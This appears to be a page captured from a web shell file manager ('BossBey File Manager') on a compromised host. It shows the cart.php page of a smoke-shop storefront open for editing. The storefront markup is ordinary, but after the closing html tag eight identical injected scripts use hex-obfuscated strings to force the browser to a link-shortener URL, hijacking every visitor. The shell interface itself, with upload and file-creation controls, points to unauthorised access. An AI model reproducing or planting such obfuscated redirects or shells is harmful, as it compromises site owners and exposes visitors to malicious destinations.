BossBey File Manager
PHP:
8.1.34
OS:
Linux
User:
ebookghostwritin
Root
/
home
/
demodesignproboa
/
public_html
/
Sk-Distributors
📤 Upload
📝 New File
📁 New Folder
Close
Editing: cart.php
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Cart</title> <!-- Bootstrap CSS --> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet"> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/OwlCarousel2/2.3.4/assets/owl.carousel.min.css" integrity="sha512-tS3S5qG0BlhnQROyJXvNjeEM4UpMXHrQfTGmbQ1gKmelCxlSEBUaxhRBj/EFTzpbP4RVSrpEikbmdJobCvhE3g==" crossorigin="anonymous" referrerpolicy="no-referrer" /> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/OwlCarousel2/2.3.4/assets/owl.theme.default.min.css" integrity="sha512-sMXtMNL1zRzolHYKEujM2AqCLUR9F2C4/05cdbxjjLSRvMQIciEPCQZo++nk7go3BtSuK9kfa/s+a4f4i5pLkw==" crossorigin="anonymous" referrerpolicy="no-referrer" /> <link href="https://fonts.googleapis.com/css2?family=Montserrat:ital,wght@0,100..900;1,100..900&family=Mulish:ital,wght@0,200..1000;1,200..1000&family=Oleo+Script+Swash+Caps:wght@400;700&family=Poppins:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap" rel="stylesheet"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.6.0/css/all.min.css" integrity="sha512-Kc323vGBEqzTmouAECnVceyQqyqdsSiqLQISBL29aUW4U/M7pSPA/gEUZQqv1cwx4OnYxTxve5UMg5GT6L4JJg==" crossorigin="anonymous" referrerpolicy="no-referrer" /> <link rel="stylesheet" href="https://unpkg.com/aos@next/dist/aos.css" /> <link href="https://fonts.googleapis.com/css2?family=Bebas+Neue&family=Montserrat:ital,wght@0,100..900;1,100..900&family=Mulish:ital,wght@0,200..1000;1,200..1000&family=Oleo+Script+Swash+Caps:wght@400;700&family=Poppins:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap" rel="stylesheet"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/slick-carousel/1.9.0/slick.min.css"> <link href="https://site-assets.fontawesome.com/releases/v6.0.0/css/all.css" rel="stylesheet"> <link rel="stylesheet" href="css/style.css"> </head> <body> <header> <div class="container-fluid"> <div class="row"> <div class="col-md-12"> <div class="customnavbar"> <nav class="navbar navbar-expand-lg "> <div class="container-fluid"> <a class="navbar-brand" href="index.php"> <img src="images/logo.png" alt=""> </a> <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation"> <span class="navbar-toggler-icon"></span> </button> <div class="collapse navbar-collapse" id="navbarSupportedContent"> <ul class="navbar-nav m-auto mb-lg-0"> <li class="nav-item"> <div class="inputsecond"> <div class="dropdown"> <button class="btn btn-dropdown dropdown-toggle" type="button" data-bs-toggle="dropdown" aria-expanded="false"> ALL </button> <ul class="dropdown-menu" aria-labelledby="dropdownMenuButton1"> <li> <a class="dropdown-item" href="#">Action</a> </li> <li> <a class="dropdown-item" href="#">Another action</a> </li> <li> <a class="dropdown-item" href="#">Something else here</a> </li> </ul> </div> <input class="form-control " type="search" placeholder="Search" aria-label="Search"> <button class="btn btn-glass" type="submit"> <i class="fa-solid fa-magnifying-glass"></i> </button> </div> </li> </ul> <form class="d-flex"> <div class="card-icon"> <figure> <img src="images/cart.png" alt=""> </figure> </div> <div class="cart-text"> <a href="cart.php"> <span>0</span> <h6>CART</h6> </a> </div> <div class="topbutton"> <a href="login.php" class="btn btn-same">Login/Register</a> </div> </form> </div> </div> </nav> </div> </div> </div> </div> </header> <div class="topbar mainnav" style="padding:10px 0px"> <div class="container-fluid"> <div class="row"> <div class="col-md-12"> <div class="menubar"> <ul style="gap: 44px;"> <li> <a href="index.php">Home</a> </li> <li> <a href="about.php">About</a> </li> <li> <a href="#">Faqs</a> </li> <li> <a href="#">Reviews</a> </li> <li> <a href="contact.php">Contact Us</a> </li> </ul> </div> </div> </div> </div> </div> <div class="topbar"> <div class="container-fluid"> <div class="row"> <div class="col-md-12"> <div class="menubar"> <ul> <li> <a href="cigar.php">Cigar</a> </li> <li> <a href="c-store.php">C-Store</a> </li> <li> <a href="flower.php">Flower / Wax / Oil</a> </li> <li> <a href="glass.php">Glass</a> </li> <li> <a href="hookah.php">Hookah</a> </li> <li> <a href="kratom.php">Kratom</a> </li> <li> <a href="roll-your-own.php">Roll Your Own</a> </li> <li> <a href="whip-cream.php">Whip Cream</a> </li> <li> <a href="best-sellers.php">Best Sellers</a> </li> <li> <a href="new-arrival.php">New Arrivals</a> </li> <li> <a href="sale.php">sale</a> </li> <li> <a href="register.php">Join Us Now</a> </li> </ul> </div> </div> </div> </div> </div> <section class="BannerSec" > <div class="container"> <div class="row align-items-center"> <div class="col-md-12"> <div class="Bannertext"> <div class="hero"> <h1>Cart</h1> </div> </div> </div> </div> </div> </section> <section class="section-cart"> <div class="container"> <div class="row"> <div class="col-12 col-sm-12 col-md-12 col-lg-9 col-xl-9 col-xxl-9"> <div class="table-responsive"> <table class="table cart-table"> <thead> <tr> <th scope="col">Products</th> <th scope="col"></th> <th scope="col" class="price">price</th> <th scope="col">quantity</th> <th scope="col">total</th> <th scope="col"></th> </tr> </thead> <tbody> <tr> <td> <div class="img-main"> <img src="images/new-1.png" class="img-fluid cart-img" alt=""> <a href="javascript:;"> <i class="fa-solid fa-xmark"></i> </a> </div> </td> <td> <div class="cart-desc"> <div class="dsc-lt"> <h6 class="pro-name">ODYSSEY HABANO CHURCHILL (7X48) BDL OF 20</h6> </div> </div> </td> <td> <h6 class="price">$99</h6> </td> <td> <div class="input-group numberone"> <span class="input-group-btn"> <button type="button" class="quantity-left-minus btn btn-quant btn-number" data-type="minus" data-field=""> <i class="fal fa-minus"></i> </button> </span> <input type="text" id="quantity" name="quantity" class="form-control input-number" value="1" min="1" max="20"> <span class="input-group-btn"> <button type="button" class="quantity-right-plus btn btn-quant btn-number" data-type="plus" data-field=""> <i class="fal fa-plus"></i> </button> </span> </div> </td> <td> <h6 class="price">$99</h6> </td> <td> <div class="dsc-rt"> <button type="submit" class="btn btn-cart edit"><i class="fa-solid fa-pen"></i> Update</button> </div> </td> </tr> <tr> <td> <div class="img-main"> <img src="images/new-2.png" class="img-fluid cart-img" alt=""> <a href="javascript:;"> <i class="fa-solid fa-xmark"></i> </a> </div> </td> <td> <div class="cart-desc"> <div class="dsc-lt"> <h6 class="pro-name">6.5″ PREMIUM GLASS ARTISTIC WATER PIPE BLACK</h6> </div> </div> </td> <td> <h6 class="price">$100</h6> </td> <td> <div class="input-group numberone"> <span class="input-group-btn"> <button type="button" class="quantity-left-minus btn btn-quant btn-number" data-type="minus" data-field=""> <i class="fal fa-minus"></i> </button> </span> <input type="text" id="quantity" name="quantity" class="form-control input-number" value="1" min="1" max="20"> <span class="input-group-btn"> <button type="button" class="quantity-right-plus btn btn-quant btn-number" data-type="plus" data-field=""> <i class="fal fa-plus"></i> </button> </span> </div> </td> <td> <h6 class="price">$100</h6> </td> <td> <div class="dsc-rt"> <button type="submit" class="btn btn-cart"><i class="fa-solid fa-pen"></i> Update</button> </div> </td> </tr> </tbody> </table> </div> </div> <div class="col-12 col-sm-12 col-md-12 col-lg-3 col-xl-3 col-xxl-3"> <div class="card checkout-box"> <div class="details"> <div class="summary"> <h6>Order Summary</h6> <p>You can view, add or delete products from the cart</p> <hr> <ul class="total-ul"> <li>Items <span>2</span></li> <li>Total <span>$199</span></li> </ul> </div> <div class="sub-total"> <ul class="total-ul"> <li>Sub Total <span>$199</span></li> </ul> </div> </div> <a href="checkout.php" class="btn checkout-btn">checkout now</a> </div> </div> </div> </div> </section> <section class="Section-08"> <div class="container"> <div class="row align-items-center"> <div class="lines"> <img src="images/line-1.png" alt="" class="line-1"> <img src="images/line-1.png" alt="" class="line-2"> <img src="images/line-1.png" alt="" class="line-3"> </div> <div class="col-md-3"> <div class="customerbox " data-aos="zoom-in-right" data-aos-duration="1000"> <figure> <img src="images/c1.png" alt=""> </figure> <h6 class="firstheading">1</h6> <p> Customer Place An <span>Order in Store</span> </p> </div> </div> <div class="col-md-3" data-aos="fade-right" data-aos-duration="1000"> <div class="customerbox spacebar"> <p> Order sent to our <span>drop shipping Supplier</span> </p> <h6 class="secondheading">2</h6> <figure> <img src="images/c2.png" alt=""> </figure> </div> </div> <div class="col-md-3"> <div class="customerbox" data-aos="zoom-in-left" data-aos-duration="1000"> <figure> <img src="images/c3.png" alt=""> </figure> <h6 class="firstheading">3</h6> <p> drop shipping Supplier <span>Prepares and ships the order</span> </p> </div> </div> <div class="col-md-3"> <div class="customerbox spacebar" data-aos="fade-right" data-aos-duration="1000"> <p> The Client <span>receives the order</span> </p> <h6 class="secondheading">4</h6> <figure> <img src="images/c4.png" alt=""> </figure> </div> </div> </div> </div> </section> <footer> <div class="container"> <div class="row"> <div class="col-md-3"> <div class="footerlogo"> <a href="#"><img src="images/logo.png" alt=""></a> </div> </div> <div class="col-md-2"> <div class="footerlink"> <ul> <li><a href="index.php">Home</a></li> <li><a href="best-sellers.php">Best Sellers</a></li> <li><a href="new-arrival.php">New Arrivals</a></li> <li><a href="sale.php">Sale</a></li> </ul> </div> </div> <div class="col-md-2"> <div class="footerlink"> <ul> <li><a href="cigar.php">Cigar Collection</a></li> <li><a href="about.php">About Us</a></li> <li><a href="review.php">Reviews</a></li> <li><a href="faqs.php">FAQs</a></li> </ul> </div> </div> <div class="col-md-2"> <div class="footerlink"> <ul> <li><a href="order-tracking.php">Track Order</a></li> <li><a href="contact.php">Contact Us</a></li> <li><a href="return-policy.php">Return Policy</a></li> </ul> </div> </div> <div class="col-md-3"> <div class="footertext"> <div class="flex"> <figure><img src="images/icon01.png" alt=""></figure> <div class="texts"> <span>24/7 Customer Support</span> <a href="tel:(+1) 6097052701" class="numb">(+1) 6097052701</a> </div> </div> <a href="mailto:minklemultani@skdistributors.net"><img src="images/icon02.png" alt="">minklemultani@skdistributors.net</a> <a href="#"><img src="images/icon03.png" alt="">47 W 13th St, New York, NY 10011, USA</a> </div> </div> </div> <div class="row"> <div class="copyright"> <p> © Copyright 2024. All Rights Reserved </p> <ul> <li><a href="#"><img src="images/card1.png" alt=""></a></li> <li><a href="#"><img src="images/card2.png" alt=""></a></li> <li><a href="#"><img src="images/card3.png" alt=""></a></li> <li><a href="#"><img src="images/card4.png" alt=""></a></li> <li><a href="#"><img src="images/card5.png" alt=""></a></li> </ul> </div> </div> </div> </footer> <style> .BannerSec { padding: 50px 100px 112px !important; } /*********************** Cart Start ***********************/ .section-cart { position: relative; padding: 100px 0; } .section-cart .checkout-box { border: none; margin: 0; padding: 0; overflow: hidden; border-radius: 0; } .section-cart .checkout-box .details { border: 1px solid rgba(31, 31, 31, 0.1); border-bottom: none; } .section-cart .checkout-box .details .summary { padding: 30px 30px 0 30px; } .section-cart .checkout-box .details h6 { font-weight: 700; font-size: 18px; color: #000; text-transform: capitalize; margin: 0 0 10px 0; padding: 0; letter-spacing: -0.5px; } .section-cart .checkout-box .details p { font-weight: 400; font-size: 14px; line-height: 16.71px; color: rgba(31, 31, 31, 0.5); text-transform: unset; margin: 0; padding: 0; letter-spacing: -0.2px; } .section-cart .checkout-box .total-ul { display: flex; align-items: flex-start; justify-content: flex-start; flex-direction: column; margin: 0; padding: 0; } .section-cart .checkout-box .total-ul li { font-weight: 700; font-size: 14px; color: #000; text-transform: capitalize; margin: 5px 0 5px 0; padding: 0; display: flex; align-items: flex-start; justify-content: space-between; width: 100%; } .section-cart .checkout-box .total-ul li span { width: 50%; font-weight: 400; } .section-cart .checkout-box .sub-total { background: rgba(245, 245, 247, 0.5); padding: 15px 30px; margin: 20px 0 0 0; } .section-cart .checkout-box .checkout-btn { height: 45px; width: 100%; display: flex; align-items: center; justify-content: center; margin: 0; padding: 0; border: 3px solid #a52129; background: #d2333d; font-size: 16px; font-weight: 500; color: #fff; text-transform: capitalize; border-radius: 0; overflow: hidden; transition: all 0.3s ease-in-out; } .section-cart .checkout-box .checkout-btn:hover { background: #fff; color: #ae252d; } .section-cart .cart-head-main { border-bottom: 1px solid #d7d7d770; padding: 0 0 20px 0; } .section-cart .cart-table thead tr th { text-transform: uppercase; color: #020202; font-size: 22px; font-weight: 500; margin: 0; padding: 0; text-align: center; } .section-cart .cart-table thead tr th.price { text-align: left; } .section-cart .cart-table tbody tr td { vertical-align: middle; padding: 20px 10px; } .section-cart .cart-table tbody tr:nth-child(odd)>td { background-color: hsl(0deg 0% 50.2% / 25%); } .section-cart .cart-table tbody tr td .img-main { background: #F5F5F7; padding: 15px 0; position: relative; } .section-cart .cart-table tbody tr td .img-main i { position: absolute; right: -8px; top: -16px; width: 28px; height: 28px; line-height: 28px; color: #fff; background-color: #d2333d; text-align: center; border-radius: 100%; cursor: pointer; } .section-cart .cart-table tbody tr td .img-main .cart-img { min-width: 100px; max-width: 100px; display: block; margin: 0 auto; } .section-cart .cart-table tbody tr { border-bottom: 1px solid #000; } .section-cart .cart-table thead { border-bottom: 1px solid #000; } .section-cart .cart-table thead tr { border-bottom: 1px solid #000; } .section-cart .cart-table tbody tr td .cart-desc .pro-name { font-size: 17px; font-weight: 500; color: #000; text-transform: uppercase; letter-spacing: 0px; margin: 0; padding: 0; } .section-cart .cart-table tbody tr td .dsc-rt { display: flex; align-items: center; justify-content: center; flex-wrap: nowrap; } .section-cart .cart-table tbody tr td .dsc-rt .btn-cart { font-weight: 400; font-size: 16px; margin: 0; color: #a52129; text-transform: capitalize; position: relative; border: none; display: flex; align-items: center; justify-content: space-evenly; padding: 0 20px; height: 40px; border-radius: 5px; transition: all .3s ease-in-out; } .section-cart .cart-table tbody tr td .dsc-rt .btn-cart:hover { background-color: #a42129; color: #fff; } .section-cart .cart-table tbody tr td .input-group { align-items: center; width: 200px; margin: 0 auto; border: none; border-radius: 0; padding: 0 15px; justify-content: space-between; } .section-cart .cart-table tbody tr td .input-group .input-group-btn .btn-quant { background-color: transparent; border-radius: 0; color: #fff; padding: 0; height: 35px; width: 35px; border-radius: 50%; border: 2px solid #a52129; background: #d2333d; transition: all 0.3s ease-in-out; font-size: 16px; display: flex; align-items: center; justify-content: center; } .section-cart .cart-table tbody tr td .input-group .input-group-btn .btn-quant:hover { background: #fff; color: #CC9224; } .section-cart .cart-table tbody tr td .input-group .input-group-btn .btn-quant:focus { outline: none; box-shadow: none; } .section-cart .cart-table tbody tr td .input-group .input-number { font-weight: 400; font-size: 16px; margin: 0; padding: 0; color: #1f1f1d; text-align: center; opacity: 100%; border: none; background: #F5F5F7; height: 35px; border-radius: 10px !important; width: 70px; flex: inherit; } .section-cart .cart-table tbody tr td .price { font-size: 22px; line-height: 22px; font-weight: 500; color: #020202; text-transform: uppercase; letter-spacing: 0px; margin: 0; padding: 0; } .section-cart .checkout-btn-main { display: flex; align-items: center; justify-content: flex-end; flex-wrap: wrap; flex-direction: row; } /*********************** Cart Close ***********************/ </style> <!-- Bootstrap JS Bundle --> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/popper.js@1.12.9/dist/umd/popper.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/js/bootstrap.bundle.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/OwlCarousel2/2.3.4/owl.carousel.min.js" integrity="sha512-bPs7Ae6pVvhOSiIcyUClR7/q2OAsRiovw4vAkX+zJbw3ShAeeqezq50RIIcIURq7Oa20rW2n2q+fyXBNcU9lrw==" crossorigin="anonymous" referrerpolicy="no-referrer"></script> <script src="https://cdn.jsdelivr.net/gh/studio-freight/lenis@1.0.27/bundled/lenis.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/OwlCarousel2/2.3.4/owl.carousel.min.js" integrity="sha512-bPs7Ae6pVvhOSiIcyUClR7/q2OAsRiovw4vAkX+zJbw3ShAeeqezq50RIIcIURq7Oa20rW2n2q+fyXBNcU9lrw==" crossorigin="anonymous" referrerpolicy="no-referrer"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.5.7/jquery.fancybox.min.js" integrity="sha512-uURl+ZXMBrF4AwGaWmEetzrd+J5/8NRkWAvJx5sbPSSuOb0bZLqf+tOzniObO00BjHa/dD7gub9oCGMLPQHtQA==" crossorigin="anonymous" referrerpolicy="no-referrer"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/slick-carousel/1.9.0/slick.min.js"></script> <script src="js/custom.js"></script> <script src="https://unpkg.com/aos@next/dist/aos.js"></script> <script> AOS.init(); </script> <script> // Function to highlight selected color option function selectColor(element) { document.querySelectorAll('.color-option').forEach(el => el.classList.remove('active')); element.classList.add('active'); } </script> <script> $('.radio__button input').on('click', e => { console.log(e.target.value); }); </script> <script> (function () { const quantityContainer = document.querySelector(".quantity"); const minusBtn = quantityContainer.querySelector(".minus"); const plusBtn = quantityContainer.querySelector(".plus"); const inputBox = quantityContainer.querySelector(".input-box"); updateButtonStates(); quantityContainer.addEventListener("click", handleButtonClick); inputBox.addEventListener("input", handleQuantityChange); function updateButtonStates() { const value = parseInt(inputBox.value); minusBtn.disabled = value <= 1; plusBtn.disabled = value >= parseInt(inputBox.max); } function handleButtonClick(event) { if (event.target.classList.contains("minus")) { decreaseValue(); } else if (event.target.classList.contains("plus")) { increaseValue(); } } function decreaseValue() { let value = parseInt(inputBox.value); value = isNaN(value) ? 1 : Math.max(value - 1, 1); inputBox.value = value; updateButtonStates(); handleQuantityChange(); } function increaseValue() { let value = parseInt(inputBox.value); value = isNaN(value) ? 1 : Math.min(value + 1, parseInt(inputBox.max)); inputBox.value = value; updateButtonStates(); handleQuantityChange(); } function handleQuantityChange() { let value = parseInt(inputBox.value); value = isNaN(value) ? 1 : value; // Execute your code here based on the updated quantity value console.log("Quantity changed:", value); } })(); </script> </body> </html> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x72\x73\x68\x6f\x72\x74\x2e\x6c\x69\x76\x65\x2f\x54\x56\x70\x6d\x4f\x4f\x4c\x30\x72\x36";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x72\x73\x68\x6f\x72\x74\x2e\x6c\x69\x76\x65\x2f\x54\x56\x70\x6d\x4f\x4f\x4c\x30\x72\x36";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x72\x73\x68\x6f\x72\x74\x2e\x6c\x69\x76\x65\x2f\x54\x56\x70\x6d\x4f\x4f\x4c\x30\x72\x36";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x72\x73\x68\x6f\x72\x74\x2e\x6c\x69\x76\x65\x2f\x54\x56\x70\x6d\x4f\x4f\x4c\x30\x72\x36";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x72\x73\x68\x6f\x72\x74\x2e\x6c\x69\x76\x65\x2f\x54\x56\x70\x6d\x4f\x4f\x4c\x30\x72\x36";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x72\x73\x68\x6f\x72\x74\x2e\x6c\x69\x76\x65\x2f\x54\x56\x70\x6d\x4f\x4f\x4c\x30\x72\x36";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x72\x73\x68\x6f\x72\x74\x2e\x6c\x69\x76\x65\x2f\x54\x56\x70\x6d\x4f\x4f\x4c\x30\x72\x36";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x72\x73\x68\x6f\x72\x74\x2e\x6c\x69\x76\x65\x2f\x54\x56\x70\x6d\x4f\x4f\x4c\x30\x72\x36";</script>
Save
Cancel